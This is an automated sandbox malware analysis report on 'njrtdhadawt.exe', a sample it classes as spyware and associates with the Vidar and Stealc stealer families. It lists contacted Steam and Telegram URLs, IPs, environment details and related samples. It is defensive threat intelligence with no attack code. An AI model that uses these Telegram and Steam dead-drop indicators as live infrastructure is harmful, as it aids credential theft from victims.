                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://recaptcha.net/recaptcha/;njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/discussions/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://store.steampowered.com/stats/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://t.me/asg7rdU_njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://medal.tvnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://broadcast.st.dl.eccdnx.comnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://store.steampowered.com/steam_refunds/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=ennjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/workshop/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://login.steampowered.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/legal/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199794498376idr7ffMozilla/5.0njrtdhadawt.exefalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://t.me/anjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFmnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://recaptcha.netnjrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://store.steampowered.com/76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://127.0.0.1:27060njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&lnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&lnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://t.me/njnjrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%d-njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://help.steampowered.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199794498376/inventory/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://api.steampowered.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://store.steampowered.com/account/cookiepreferences/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://store.steampowered.com/mobilenjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://t.me/asg7rdidr7ffsqlo.dllMozilla/5.0njrtdhadawt.exefalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://steamcommunity.com/76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    104.102.49.254
                                                                                                                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                                                                                                                    		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                    149.154.167.99
                                                                                                                                                                                                                                    		t.meUnited Kingdom
                                                                                                                                                                                                                                    		62041TELEGRAMRUfalse

                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1575809
                                                                                                                                                                                                                                    Start date and time:2024-12-16 10:43:50 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 5m 39s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:17
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:njrtdhadawt.exe
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/3@2/2
                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                    • Number of executed functions: 48
                                                                                                                                                                                                                                    • Number of non-executed functions: 168
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • VT rate limit hit for: njrtdhadawt.exe

                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    06:11:52API Interceptor1x Sleep call for process: njrtdhadawt.exe modified

                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                    149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/?setln=pl
                                                                                                                                                                                                                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • telegram.dog/
                                                                                                                                                                                                                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                    • t.me/cinoshibot
                                                                                                                                                                                                                                    jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                    • t.me/cinoshibot

                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    t.meT0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.26.10.61
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    YbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106

                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    TELEGRAMRUT0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    AKAMAI-ASUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.59.85.230
                                                                                                                                                                                                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.116.165.114
                                                                                                                                                                                                                                    sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.192.60.185
                                                                                                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.84.160.204
                                                                                                                                                                                                                                    spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 23.74.215.158
                                                                                                                                                                                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.93.240.58
                                                                                                                                                                                                                                    bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 95.100.63.198
                                                                                                                                                                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 23.50.102.44
                                                                                                                                                                                                                                    rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                    • 104.105.175.143

                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                    c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    • 149.154.167.99

                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    C:\ProgramData\chrome.dllXg0OdI1VqO.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                      A3W2CpXxiO.exeGet hashmaliciousStealc, VidarBrowse
